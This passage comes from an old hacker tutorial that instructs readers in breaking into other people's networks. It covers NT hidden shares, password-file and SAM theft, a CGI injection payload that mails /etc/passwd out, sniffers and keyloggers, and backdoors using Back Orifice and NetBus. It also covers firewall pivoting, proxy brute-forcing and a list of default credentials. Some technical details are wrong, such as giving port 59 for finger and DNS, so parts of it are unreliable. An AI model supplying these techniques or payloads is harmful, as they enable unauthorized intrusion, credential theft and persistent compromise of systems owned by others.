good DOS book, and at least find out about commands and DOS environment variables. You could make yourself quite a powerfull brute
force share-cracker batch file in under 20 lines. I personally use VB for brute force engie making. Also, if you want to quickly search an
entire (or even multiple) subnet(s) for open shares, use a sharescanner such as Legion.
One last thing on shares - often times Administrators hide certain shares. This means that it wont show up on a Net View. But if you
connect to it (Net Use) by name, you will be granted access. Below is a list of common hidden shares:
ADMIN$ (remote administration - can you say rootshell?)
IPC$ (these are really fun...)
SMB$ (samba server)
SMBSERVER$
The dollar sign at the ends is what makes it a hidden share. You must include it in your Net Use command. One last note on NT hacking.
The WINS (Windows Internet Naming Service) protocol is responsible for translating NetBEUI names (NetBIOS uses computer names
instead of addresses) to IP addresses. To look at the WINS configuration of any computer, use the nbtstat command. Furthermore, the
file lmhosts.sam on any windows machine will act as a mini WINS table if WINS itself is disabled (TCP/IP properties under Control
Panel/Network). What does this mean to you as a hacker? Lets say the NT computer you are trying to break into is 200.23.54.1. Do an
nbtstat -A 200.23.54.1 to get its NetBEUI over TCP/IP info. Of importance is any entry with a <20> hex value - this means the computer
is sharing (and that you can connect via the NET command, or in the technique I'm about to explain). A <00> means that this is the
computer's name. So to connect to the computer, add it to your lmhosts.sam file. The entry would look something like:
200.23.54.1 compname #pre
Then, reload your NBT cache by issuing a nbtstat -R
Your computer now knows how to directly 'NetBEUI into' that machine. Go to Find on your start menu, then Computers, and type in the
computer name. If you did everything correctly and have your network configurations correct (see above for instructions on how to do it),
that computer will pop up. To connect, just double click on it. I suggest copying a shortcut to your desktop, or your Network
Neighborhood.
Novell Netware
Unix machines still claim most machines on the Net. NT is catching up, and between the Posix and Microsoft platforms, you wont find
much else on the Internet. Once in a great while, however, you just might run into a completely different operating system. Novell
Netware used to be the biggest Client/Server Network Operating System around, and rivals NT to this day. So just in case you run into
one of these foreign systems, here is a little info on Novell Netware.
Netware has been around for quite some time - the first version was command-line and sat on top of DOS. Now GUI (Graphical User
Interfaces) clients exist for it, and version 4.5 has been released. Like Windows NT, computing is not centralized (like Unix), and
resources are distributed among the network. One computer may be a print server, on might be a mail server, another a file server. The
thing that makes Netware unique is what's called the NDS database, or Novell Directory Services. The NDS is comparable to an NT
network's PDC's registry. It is a heirarchticle representation of the entire network. At the root of the NDS tree is the object 'root,' similary
to a root directory. Stemming from the root object, are one or more 'organizational' objects, comparable to subdirectories. Inside these
objects can be more organizational objects, or what are known as 'leaf' objects, comparable to files. These leaf objects are what make up
the conceptual network. Leaves include user objects, representing users of the network, server objects, representing servers, and so on.
The organizational units exist for no other reason to conceptually organize the network. The whole idea of an NDS is sometimes hard to
grasp at first, due to its being so abstract, but greatly eases administration.
When you refer to a specific file on a hard disk, you refer to its path. When you refer to an NDS object's location, you refer to its context.
Paths start with root at the left, such as:
C:\Winnt\programs\file.ini
Contexts, on the other, hand, start with the root at the right, such as:
.user22.market.UAS
wherer user22 is the object we are referring to. We don't need to specify root because its assumed that root is always after the last
organizational unit listed. The context above specifies the user22 object, which is in the organizational unit 'market,' which resides in the
organization 'UAS.' When referring to objects absolutelty (full context), you must start the context with a perions (.), and separate each
entry with a period also. Now if your current working context was .market.UAS (same concept as a current working directory), you could
refer to user22 relatively (just as in Unix or DOS filesystems) with simply:
user22
with no period.
Now, Netware networks are usually GUI interfaces. If you ever connect to a Novell server over the Net, you will have to navigate it
commandline, though. Mapping network drives to Netware volumes (simiar to a Windows share) as you would to an NT machine, with
the MAP command. You would change your context and navigate the NDS with the CX command. In order to do this, you will need to
get your hands on a Netware client. You can get a free command-line client at www.novell.com.
Now each user in a Novell network is represented by a user leaf object on the NDS tree. So to log in as user22 who's object is in the
marketing.UAS container, you have to log in as:
.user22.marketing.UAS
Mapping drives to Netware volumes is done in one of two ways. You can either specify the server name you are connecting to physically,
such as:
map x: servername/volumename
or by its NDS object, such as
map x: server_nds_object:volumename
When trying to break into a Novell server on the net, with say, an IP address of 212.14.6.2, you would issue this command (with a novell
client in a DOS box):
map x: 212.14.6.2/volumename
It is beond the scope of this text to get into great detail about all the commands and innerworkings of Netware, so feel free to jump into a
Netware book. Really.
"Unbeleivable - a Hacker!"
The object of your hack will most likely be to obtain root, ie: total control over the network. With a rootshell (any shell with root
privelages, such as the superuser account) you can read, write, and execute everything on the network (or at least that particular
computer). To obtain root, you'll probably have to break in with some other account first. From there you can run a local exploit,
download the password file, or whatever.
Sploits
A local sploit (exploit) is a program that exploits some security bug inherint in the operating system, and will greatly increase your access
levels, oftentimes to root. There are many exploits out there, for many different network operating systems. One of the most common of
these is the Buffer Overflow (also known as a Stack Overflow). This is a technique which when ran, the OS's buffer (a container of
memory set aside by the OS for data it's working with) if filled with garbage. When the buffer is "filled," the last string on the stack can
be executed, to do such things as initate a root shell. To use any exploit, of course, you need to have an account that you can log into FTP
with and upload the exploit from your computer to the server you want to run it on. You then need to log in via telnet and run it. Exploits
are OS and version specific, and it's sometimes hard to find one for a specific one (they are usually available all over the Internet). If this
is the case, you'll have to resort to more traditional methods of getting root. Like cracking the password file.
The Password File
In the /etc directory (UNIX) is a file called passwd, which holds every password for every user, along with some other information.
Unfortunately for you, the passwords are encrypted. This means you'll have to download the password file and crack it on your own
computer. You'll use a password cracker such as John the Ripper for this. Another security feature system administrators will use to keep
hackers out is password shadowing. If shadowing is done (and oftentimes is), all the encrypted passwords will be replaced with *'s or x's.
These are not crackable. The real password hashes (encrypted passwords) are most likely on a different file, such as /etc/master.passwd,
or /ect/shadow. Look around. To give you an idea of what to look for, here is an encrypted password file:
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:3A62i9qr:1012:10:Hisaharu
Here is a shadowed password file:
root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:*:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh
At any rate, when you crack these, depending on the encryption strength and passwords used, you should get a handfull of valid
usernames and passwords. If you didn't get the root password, you could also use one that belongs to the same group as root (such as
admin or sysop). One note about root: a lot of systems are set up so that root cannot log in remotely (from outside). This means you'll
have to log in as someone else, then use the 'su' command and enter the root password (su is used for system administrators to jump
around from account to account, and stands for 'substitute user.')
NT passwords are a little different. They are kept in the registry, not just a file like Unix, which makes them harder to get your hands on.
They are encrypted as well. There are a few ways to get them. Since most of the registry is held in memory while the computer runs, you
can do a core dump, or more specifically, a registry dump. You'll need L0phtCrack to do this, and Windows NT (so now might be a good
idea to put an NT partition on your hard drive). If you are physically near the NT box you want to hack, just install L0phtCrack and select
the Registry Dump option. Otherwise, you have two options on getting the password hashes (encryped password) over the Internet. If the
NT machine allows for remote registry sharing (not common), and you have NT at home, you can extract the password from your target's
registry with L0phtCrack. Just enter your target's IP address, and in a few seconds you'll find out if it allows for RRS or not. If not, you
have only on option left. Windows NT registry's are made up of Hives. Each hive is stored in a *._ file. The hive with the passwords in
it is SAM._. So why don't you just download it like a UNIX password file? Because NT is set up not to let anyone see, copy, or modify
the SAM hive. Your only hope is to boot your target machine into an alternative OS, like Linux or DOS, then get the file (NT protects the
file, DOS and Linux doesn't). This is difficultover the net. It is, however possible. Also, you'll need a program that will allow DOS
(which uses the FAT filesystem) or Linux (which uses the EXT2 filesystem) access the partition that SAM._ is on (which is in an NTFS
filesystem partition). Once in a while, though, you may come across copies of the hives (all with ._ extentions) stored in a directory like
'repair' or 'reg_backup'. With all the work that it takes to get NT passwords, you're usually better off trying some other method of getting
in, like exploits.
Infiltration
Again, every open port (port that you found during your portscan) is a door to the insides of that computer. To find out how each port is a
potential point of infiltration for you, you'll need to find out a little more about each protocol. Do some research. For now, I've provided
a little info on how you can use these protocols against the computer.
Again, when you log in via a telnet port, it as if you are directly connected to and part of that network. One of the first things you should
try is the "front door." Telnet to the machine, and try some commonly used username and password combinations. Next, try each of the
email addressed you've collected. About one in twenty people are dumb enough to use thier first name or login name as thier password
(assuming they are allowed to set thier own password), so try that too. Chances are this won't work (though its a good idea to try
anyways), so you can move on to hacking in through various ports.
Oftentimes the FTP service allows for anonymous logins (logging in with 'ftp' as a username and no password). When you do so, your
home directory will be something like /usr/daemon/ftp or /home/ftp. However, if you issue a pwd (to find what directory you're currently
in), it will say that your pwd is / (root). This means that you are in a restricted shell. So if after logging in anonymously you cd (change
directory) to lib, you will be told that you are in /lib, while you'll really be in /home/ftp/lib, or whatever. System admins like to put /bin's
and /etc's in the ftp directory, and in the /etc will be a password file - but don't get your hopes up - 99% of the time its shadowed.
Anonymous ftp access is realy only helpful if you can download usefull information.
If you see an open finger port, this could be the break you were looking for. Use a finger client and do a generic query (no usernames) to
possibly get a list of users logged on. Next try putting an @ symbol in front of the domain you are querying, for a list of all users, logged
on or not. For specific user information, type in username@domain.
If you see a port called 'nbsession' open, you may also be in luck. This usually means that this particular server is an NT box (much less
commonly used than Unix). Refer to the NT section.
The rlogin port may be another point of infiltration. This is kind of like telnet, though older and not as secure. Telnet to it and see what
you can do.
The Gopher protocol was used as a text transfer protocol before the days of HTML, the WWW, and graphics on the web. If you come
across a gopher port, use a browser with a built in gopher client (newer versions of Navigator and MIE) and connect to it. You'd be
amazed as to what the gopher service will sometimes let you see.
Write down any other ports you see. Telnet to them all, and see what happens. If after you telnet in nothing happens, issue commands, hit
enter a few times. Play around - as I said before, 80% of what you will know will come from experience, not texts.
Remote Sploits
Another way to use the FTP and SMTP ports against the server is with a remote exploit. Local exploits are those that you execute on the
server, whereas remote exploits you launch from your computer. Both can be found on various sploit archives on the Net. Remote, as
with local exploits, are service and version specific, in that they exploit a security bug inherint in the programming of the service itself. If
the FTP port has the service wu-ftp ver 2.2.4, go out and find the exploit for that exact service of that exact version. If the SMTP port is
running sendmail 8.8.8, get the sploit for it. These exploits will be in the form of C code (usually), so you'll need to compile them. Most
assume that you have specific header files (*.h), so you may need to find those as well - look at the code to be sure. To make obtaining
the header files and compiling the exploits a heck of a lot easier, you ought to think about putting a Linux partition on your hard drive. At
any rate, most remote exploits, if correctly implemented, when lauched give you root access, or at least access. To find out what service
an FTP port is running, telnet to it, it might just tell you. If not, use the SYST command, and then you'll be told. You may have to log in
to do so - try doing so anonymously. As far as SMTP, it hides its service software and version much less often that FTP does.
Eleet Hacker Tactics
Up to this point, you've learned the basics of various NOS's, and how the Internet works. "When will we get to the core hacking stuff?"
You have been - breaking into a system is nothing more than understanding it thouroughly, knowing the 'rules', what you can and can't do.
Hacking is taking what you know, and using that to circumvent usually half-hearted attempts to keep casual onlookers from being where
they aren't supposed to be. Your most powerfull weapon is a braud knowlege of computers and networks, and thourough knowlege of
your target. Meaning go get yourself a Unix boox. Well, now that you know the basics of hacking, I'll go into some more advanced
tactics you can employ to gain access to computers on the Internet.
Service Exploitation
One of the first things you should do when you target a particular machine is telnet to every port and find out what services are running.
Find out what FTP service, what POP and SMTP daemons are running (when you telnet to the appropriate port, it will usually tell you).
Then go to sploit archives like www.securityfocus.com, www.roothshell.com, and subscribe to BugTraq and NT BugTraq. Look up every
service/daemon you find, as well as the Operating system. Most exploits are in C, so you'll need to put a Linux partition on your hard
drive to get it to compile and run. If you have problems compiling the sploits, brush up on your UNIX C utilities. Look in the manpages
for cc, gcc, and make (if there is a makefile, which makes compiling the sploits lots easier).
CGI Exploitation
CGI (Common Gateway Interface) is a method used to make web pages more interactive. For example. You visit your account at
Hotmail. You type your username and password into the text boxes, and click 'enter.' The hotmail computer then reads what you typed,
and runs a script (which could be in a variety of programming or scripting languages) that logs you into your account. That's CGI.
Anytime you interface with the website (such as search engines) you are using CGI. CGI adds lots of functionality, and lots of security
issues. There are currently all kinds of know CGI exploitations. Two old ones are http://www.someserver.com/cgi-bin/phf and
http://www.someserver.com/cgi-bin/finger. If the file in question (/cgi-bin/finger) exists, and you request it, you will get a box up. In the
box, type:
root ; mail you@youremail.address < /etc/passwd. What this does when the computer runs the script is issue the command:
finger (whatever you type in the box). The ; operator starts a new command, which in this case is displaying the password file on your
browser. Copy it, paste it into a text file, and crack it. To find CGI exploits, get a CGI exploit scanner (such as WebChk, available at The
CyberUnderground) or use on on a web site such as CyberArmy.com or infinityzone.cjb.net.
Another problem with CGI is that webservers that are CGI enabled have special 'CGI executable direcories'. These include /cgi-bin/
(Unix), /cg-win/, and /cgi-dos/ (windows machines). The HTTP daemon knows to execute any file requested in those directories.
Normally, when you type www.someserver.com/index.html, all that is happening is the daemon sends you a copy of index.html. If you
type www.someserver.com/cgi-bin/program, the daemon will actually run program, if it exists. The output of this proccess is usually
exported to HTML format and sent to your computer. You as a hacker could exploit this, though, by running programs of your own on
the remote machine (if, say, you had FTP access but not telnet). Great for spawning exploits.
In order to find out whether or not a particular web serveris vulnerable (ie: has a CGI file somewhere on it that can be used to gain access),
you can do a number of things. Download WebChk to scan for you. Go to a website such as infinityzone.cjb.net and use thier built in
CGI scanner. Or, for best results, obtain a list of vulnerable CGI files/servers and use a browswer to scan for them manually. Doing
things yourself, rather than useing canned hacker tools, always provides better results along with expanding your own knowlege.
Sniffiing and Keylogging
Oftentimes you'll need to break into not-so-interesting computers to get to your ultimate goal. If you are trying to break into your target
network's webserber (www.yourgarget.com), and while trying, found a vulnerability in thier mail server (mail.yourtarget.com), you have a
few options on how to get into the webserver from the mailserver. If you install a sniffer (available at many hacker sites), it will look at
all data passing it on the network for passwords and the like. It will copy and store that information in a file for you to peridically check.
Sniffing (which is considered an eleet hacker tactic), if done correctly, almost always provides results. Another option is installing a
keylogger on the mailserver. Any keystrokes entered on that computer are kept in a log file. Periodically check the file, and you'll usually
come up with a password to something else interesting. Be carefull though. If you don't hide your sniffers or keyloggers well, you stand a
good chance of getting busted, or at least losing any access you had.
Leapfrogging
Most firewalls keep you out of 90% of any given network on the Internet. How? They look at your IP address, and determine if it should
allow you in or not. Usually, this is a router (a piece of hardware used to connect different networks) that has a list of IP addresses to
accept. If yours is not in that list, it will reject your connection. It's a good bet that this list contains mostly machines inside that network,
or from a few other trusted networks. Oftentimes router firewalls let connections pass from other computers in the same subnet. Lets
pretend you are 203.22.54.77. You want to get into admin.somecorp.com (34.14.91.15), which is behind the firewall.
Www.somecorp.com is (like most webservers are) in front of the firewall, and is 34.14.91.3. If you try to telnet to admin, chances are you
wont even get a login prompt, just a 'connectoin failed' messege. But if you telnet to www, then to admin, your IP address is that of
www's - 34.14.91.3. Which is in the same subnet of admin, and will most likely be accepted in. And there you have your login prompt at
admon.somecorp.com. This is conceptually hacking around a firewall. To break right through, well, you'd better be elite.
Trojans
Dont assume that once you have access (beit a rootshell or just user or guest access) to a computer, you always will. One good way to
increase your chances of keeping access to this computer is to put in a back door of some kind. The easiest (and arguably most helpful to
a hacker) is a Trojan Horse. Trojans come in all shapes and sizes, for all kinds of OS's. The two most popular are Back Orifice (BO 2000
just came out), and NetBus. Both are for Windows boxes (try RootKit for a UNIX trojan). BO by itself is commandline, but GUI's
(Graphical User Interfaces) are available for it. BO has a server (that you install on your target) and a client program (that you use at
home to controll your target). With it, you can browse and manipulate data and directories on your target. You can send message boxes
to the computer to scare people on it. NetBus, on the other hand, has more functions than BO (like screenshots of your victim, opening
and closing the CD-ROM, etc), but doesn't hide itself quite as well as BO. NetBus, like BO, has a client and a server. Though Trojans are
extrememly fun to scare sysadmins, if you want to keep your access to the box, you should only use it as a backdoor.
Port Hacking
If you cant find any exploits for the daemon you've found, that doesn't mean its not vulnerable. Theoretically, every daemon bound to a
TCP port is vulnerable to be used an access point to the computers insides. Telnet to the port, and interact with the daemon. At the top of
your telnet window is the word 'Telnet.' As soon as it says 'Telnet - www.yourtarget.com' (or some IP address) you are connected, have
established a session, whether you see text or not. Send controll characters (control-x, control-c, etc). Type commands like, GET, GO,
START, LOGON, INIT, START, etc. If what you type doesn't show up on the screen, that means that the daemon isn't echoing your
characters back to you - turn on your local echo so you can see what you are typing.
For example, did you know that when browsers connect to the HTTP port, they issue commands based on URL's you request? You can
do this manually - telnet to port 80, issue a GET command with the page you want to view, hit enter twice, and the HTML will pour
accross the screen. You are doing manually what Netscape, Internet Explorer, and Lynx do for you (except, browsers parse the HTML
into readable text). Any client program that communicates with a server program on some port is just issuing various commands to the
daemon based on how the user interacts with the client interface. Some times, an initialization command needs to be issued before the
daemon will talk to you. Try anything you can think of. Also, it helps to know what types of programs are bound the the port you are
hacking. Refer to the RFC on well known ports at the end of this text.
One last note on this topic. Sometimes, sysadmins, authorized users, and even other hackers will bind a daemon to some extremely high
port number as a back door. Casual portscans will miss these, unless they are set to scan to high numbers. If you see port 12345 or 31337
open on some computer, someone was here before you - these are the defaults used by the NetBus and Back Orifice trojans. Also, lazy
system administrators sometimes put daemons on high port numbers that let them telnet in without a password. The morale of this story?
Always scan to at least 40000.
Brute Force
When all else fails, you might be left with no other option than a brute force attack. This means hurling usernames and passwords at
sytem until it cracks. Use the list of commonly used combination supplimented with this text. Spend time trying to crack individual email
addresses. Honestly, you havn't made a full-hearted brute force attempt untill you've spent at least two or three hours doing nothing but
trying different combinations. Since Unix login prompts wont tell you if you've used a valid login name or not, narrow it down! Here is a
quick list on how to obtain usernames:
*If port 59 (finger) is open, you will be able to obtain lots of usernames. Telnet in!
*Telnet to port 25 (SMTP) and use the VRFY command to verify the existence of usernames. Type HELP for more
commands.
*Any email addresses on the network's webiste will be valid usernames.
*Look at the /etc/passwd file of any Unix machine (including one of your own). There are tons of default usernames that get
used all the time.
Also, you could write a program (or shell script if you have a Unix box yourself) to spit usernames and passwords from a dictionary
wordlist fill at the system (available all around the Net, usually in suppliment to password crackers).
If you want to become eleet eventually, you'll need to learn at least a little about at least a few programming languages. The easiest (yet
still effective) language to learn, especially for newbies, is Visual Basic. I once wrote a VB prog that used NetCat, and repeatedly
telnetted to my target and spat usernames (from a list that I compiled that I knew to be valid usernames) and passwords (from a huge
dictionary file), and redirected all output to my screen and a log file. I'm no programming expert, but with an hour of coding and another
of debugging, all I had to do was sit back and watch as my little proggie automated a brute force attack with decent speed. Just remember
- brute force will always work, eventually.
Firewall Penetration
Ahh firewalls. Technology with only one purpose - keeping hackers out. Many newbies are intimidated by a system they know has a
firewall, and don't even bother. Technically, though, every network has a firewall. A firewall, by definition, is nothing more than a
system used to secure the network. Nothing specific, just that and nothing more. So if all that is blocking a network from outside access
in a UNIX login prompt, that is its firewall. Generally speaking, though, when we refer to a firewall, there are a few distinct levels. Here
I'll explain those levels, and how to circumvent them.
Routers as Firewalls
When you scan a class C subnet, and find three computers, do you think that those are the only three computers on that network? Not
usually. Every network that is connected to the Internet is connected via a complex piece of hardware known as a router. Routers route
packets of data based on the source IP address of the sending machine, and the destination IP address of the receiving machine. Similarly,
routers can block certain IP addresses. Every packet of data sent to any computer in your target network must pass through the router
connecting the two, and if the router is programmed to not let connections be made to one particular computer, it will discard all packets
sent to it, thus blocking you from connecting to it. Also, routers can be setup to allow connections to certain machines, but block certain
port numbers. So if you scan a machine that has an open port 23 but is being blocked by the router, you won't be able to establish a
connection. It is rare, though, that routers are configured to disallow connections from all IP addresses. Generally, it will allow a select
number of IP addresses through. Like affiliate companies, or different networks of the same company. So how do you penetrate a
firewall router that won't let you through? Masquarade as a trusted computer. Bounce your connection off a computer that the router
might let by. For example, lets say you hacked an account on the webserver (port 23 was not blocked). That's not enough for you - you
want root on the hub computer of the network. But port 23 is blocked on it. You might connect to the webserver, then, from it, telnet to
your target machine. Chances are the router will let you connect - why wouldn't it let a computer from its own network connect?
Any computer that is blocked by a IP filtering router is said to be behind the firewall. Any that is not blocked is said to be in front of the
firewall. There are a number of computers that cannot be behind a firewall. The web server, for example. How could people get the web
page of your target if it was blocked? Also, mail servers have to be in front of the firewall, so that emails aren't blocked, and get sent t
appropriate recipient. Name servers (computers with port 59, DNS, open) also cannot be blocked, as they are the computers that translate
names (such as www.microsoft.com) into a network IP address. The trick to connecting to a computer blocked by a packet filtering router
is to masquarade as a computer in a trusted network, or from a computer in front of the firewall.
There are other ways to masquarade as a computer from inside your target network to pass through a firewall. What if your target
machine is an NT Server? There is no telnet daemon. Well, if there are NT servers on the network, there will be NT Workstations
and Windows 9x boxes too.
And those machines will probably have internet access. How do they connect to the internet? Via a proxy server
- all HTTP requests are directed to the designated proxy server, who requests the URL for them, gets it from whatever webserver the web
page is on, and sends it back to the workstation inside the internal network that originally requested it. Remember that when computers
surf the Internet via a proxy server, thier IP address (to the Internet) is that of the proxy servers (read the 'keeping from getting caught'
section for more details on how this works, or check the definition of 'proxy server' at the beginning of this text). So how do you connect
to a webpage inside on an internal computer that is blocked by the router? Connect via the network's proxy server. If a proxy server
exists (which one will, 99% of the time), it cannot be blocked by a firewall - how would the requested web pages be sent back to it if it
were? Okay, so we know that one of the computers that turned up on a subnet scan is probably a proxy server. Your next step is to use it
to make connections for you. Go to your Netscape of Internet Explorer settings, and select 'proxies.' (Note: proxy setting on your Internet
Prefferences of Control Panel only work if you are physically connected to the a proxy server, meaning on the same LAN as it.) For
HTTP ports, try 80, 8080, 88, and 8888. For FTP, try 21, 2121, etc. Its less common, though, for proxy servers to be setup to handle FTP
proxying. So for each computer you found on the subnet, enter it in as a proxy server in your browser settings, hit 'Okay,' and then just
request any web page. Www.hackers.com, or whatever. On the bottom of your screen, you will see your browser attemptint to connect to
the proxy server. If you get an error message, the computer is not a proxy server, or you specified the wrong port number (try some
others). If the web page you requested shows up on your browser - congratulations, you connected to the proxy. Now request pages (or
an FTP session) with a computer behind the firewall - chances are it will let you in since your IP address is now the proxy sever's when
making connections of the protocol you specified to use proxies for (and again, firewalls generally allow connections from computers of
its own network). Now, proxy servers will allow computers to use it as a proxy based on a set of criteria. These are:
*Always - any computer connecting will be allowed to use this proxy (known as a public proxy)
*Depending on who connects to it, ie: the IP address of the connecting computer, or
*If the connecting computer can validate itself with a username and password
If you are prompted with a username and password request, you are not out of luck. Get yourself WebCrack, enter the proxy server as the
target machine, and launch an attack. Proxy server authentication is exactly the same as password protection of private web pages, and
WebCrack will brute force untill its let in. Once you find a valid username and password combo, you will be able to use the proxy. Now
connect to the computer blocked by the router.
You've just cracked a firewall.
Private IP Networks as Firewalls
Certain ranges of IP addresses are known as 'private.' For example, all the 10.x.x.x (class A) networks are private, and if you try to
connect (telnet, http, whatever) to one of these addresses, the address will not resolve (ie: you wont be able to connect). Often times,
companys will buy a range of private IP addresses, in order to keep hackers out. This is another form of a firewall. However, if the
company wants thier network connected to the internet in any fashion (for thier workstations to be able to surf, or for email, or whatever),
at least on computer has to have an public IP address, meaning an IP address that the Internet (and therefor you) can connect to. This
computer is a proxy server of types, and generally has two Network Interface Cards (adapters used to connect network cable to), one with
one of the private addresses, on with a public address. This 'public' computer, being the specialized proxy server, will (unlike your
computer, and any other on the Internet) understand the private address. So to connect to the 10.x.x.x (or whatever private address your
target uses internally), you'll need to connect to the proxy server. If its a Unix machine, you'll have to get an account with telnet access,
and telnet from it to your destination. If its a Windows machine, you'll have to use the proxying method explained above.
Since the proxy server is the only computer on the entire Internet that is able to connect to the private network protected by this type of
network, you will have to connect through it. One other option is hacking into it, and installing a port redirector program. For example: if
you can install NetBus onto the computer, you can set it to redirect all connections made to a port you specify to another address. So lets
say when you try to connect to 10.2.56.14 (reserverd) with telnet, you get a 'failed to resolve address' message, meaning that address is not
on the Internet, and your computer (nor any other on the Internet) understands that address. But you know that 204.56.87.5 (an address
that is on the Internet, and that you can connect to) is the proxy server for the 10.2.56 network. You break in, install NetBus, and set the
port redirector to 10.2.56.14. Next - telnet to 204.56.87.5 (on the port you specified to be redirected) and sine 204.56.87.5 knows where
10.2.56.14 is, your connection will be bounced over to that machine.
Congrats - you've just penatrated another firewall.
In Summary
With this text I've scratched the surface of the hacking of today. If nothing else, you should have learned just how much you're going to
have to learn to become a proficient hacker. You'll need to learn more about various protocols, about different operating systems.
Learning programming languages such as C or Perl would definitely help you. There are a lot of programs out there, but most do the
same as its legitimate counterpart would do, and don't allow much room for fine tuning. Emagine the power in the ability to write a
target-specific program to aid you in hacking it! Anyways, I also strongly suggest installing Linux on your machine as well. Unix is
more powerfull (and therefore more complex) than DOS and Windows, and the only way you'll learn anything about it is to have it (not to
mention raw sockets!). Even a book wouldn't be of much use if you had nothing to apply what you've learned on. When faced with a
challeng that you don't quite understand, fumble your way through. Try not to ask for help all the time. You'll learn a lot more that way –
and not just about the obstacle in question. In closing, let me say that you should never decide that you know enough. An unquenchable
thirst for knowlege is what drives the real hacker. The process, not the end result. I guess I see no better way to end this text than with
my favorite quote (from a good friend of mine):
"What do you want to hack today?"
< Kurruppt2k >
Appendix A - Commonly used and default usernames/passwords
root: root
sys: sys / system / bin
bin: sys / bin
mountfsys: mountfsys
adm: adm
uucp: uucp
nuucp: anon
anon: anon
user: user
games: games
install: install
demo: demo / tour / guest
umountfsys: umountfsys
sync: sync
admin: admin
guest: guest
daemon: daemon
qadmin: adm / admin
sys: sys system / bin
123: lotus / lotus123
anonuucp: anon / uucp
asg: device / devadmin
backup: save / tar
csr: support / castup
dbcat: database / catalog
default: user / guest
diag: diag / sysdiag(s)
field: fld / test / support
end: visitor / demo / tour
informix: database
ingres: database
lib: library / syslib
lp: print / lpadmin /
main: sysmaint / service
mail: mail / email / phones
manager: mgr / man
ncrm: ncr
net: netowrk
netinst: inst / install / net
netman: net / man / mgr
netmgr: mgr / man / net
network: net
nobody: anon
nuucp: anon
oasys: oa
odt: opendesktop
oper: operator / sysop
sysop: sysadm / sysop
ftp: ftp / anon / anonymous
telnet: telnet
visitor: anon / guest
www: webmaster / webadmin
Appendix B - Unix commands
Here are some basic commands that work on most Unix flavors
cd [dir] change directory to [dir]. cd with no arguments will place you in your home directory.
pwd tells you what directory you're currently in.
ls lists the files in your pwd
ls -a lists all files in your pwd, even hidden files (files that begin with a period)
ls -l lists the files in your pwd, and gives the permissions for them
cat [file] displays the file you argue on the screen, equivalent to 'type' in DOS
vi, emacs, and pico text editors, similar to MS-DOS Edit
man [command] gives you the manual (help pages) on a particular command - USE THIS!!!
cp [src][dst] copy a file
rm [file] delete a file
mv [file] move or rename a file
mkdir create a directory
chmod change permissions of a file you own
grep search a file for a particular string
talk chat with a user
mail, pine and elm email utilities
Also, if you are fermilliar with DOS redirects, appends, and pipes, they work similarly in Unix. Remember, when in doubt, RTFM!
Appendix C - Further Reading
There are lots of text on hacking and Internet security out there, and a few books as well. As stated at the beginning of this one, a large
portion of those are vague and too theroized to be of use to anyone. So here is a small collection of recommended reading I put together.
Texts
Hacking Kit (www.hackers.com) - focuses on UNIX hacking, and has lots of c code for various utlities and exploits.
Hacker's Desk Reference (www.hackersclub.com/km/fils/hfiles) - focuses on NT and Windows Networking environments.
A great resource, but might be a bit much for newbies.
Guides to Mostly Harmless Hacking (www.happyhacker.org) this series is great for green hackers. They provide step-by-step methods
and techniques on a variety of topics, from encryption to Windows hacking, to Unix, etc.
Books
Maximum Security - "The Hacker's Bible." This book will not give you step-by-step instructions on how to hack. If you already know a
lot of the basics, this book is a must. The second edition is about two inches thick. Even when you become "elite," this book is a great
reference to have around.
Happy Hacker - a compilation of the GtMHH's. A good book for aspiring hackers.
Inside TCP/IP - gives you a wide knowlege of the protocol used on the Internet, and explains how to use it to set up all kinds of servers
(web, FTP, etc).
The Big Unix Book - you will need to know Unix, so grab this book too.
Windows NT Core Technology - if you want to know the innerworkings of NT, grab this one too.
The Rainbow Books - priceless resources to any hacker... but I won't tell you any more.
Appendix D - Commonly known UDP and TCP ports
PORT NUMBERS
The port numbers are divided into three ranges: the Well Known Ports,
the Registered Ports, and the Dynamic and/or Private Ports.
The Well Known Ports are those from 0 through 1023.
The Registered Ports are those from 1024 through 49151
The Dynamic and/or Private Ports are those from 49152 through 65535
WELL KNOWN PORT NUMBERS
The Well Known Ports are assigned by the IANA and on most systems can
only be used by system (or root) processes or by programs executed by
privileged users.
Ports are used in the TCP [RFC793] to name the ends of logical
connections which carry long term conversations. For the purpose of
providing services to unknown callers, a service contact port is
defined. This list specifies the port used by the server process as
its contact port. The contact port is sometimes called the
"well-known port".
To the extent possible, these same port assignments are used with the
UDP [RFC768].
The assigned ports use a small portion of the possible port numbers.
For many years the assigned ports were in the range 0-255. Recently,
the range for assigned ports managed by the IANA has been expanded to
the range 0-1023.
Next To :: Digital Voodoo - The Craft of Hacking on the Internet - Part 2
Credits
-- UnKnown --
|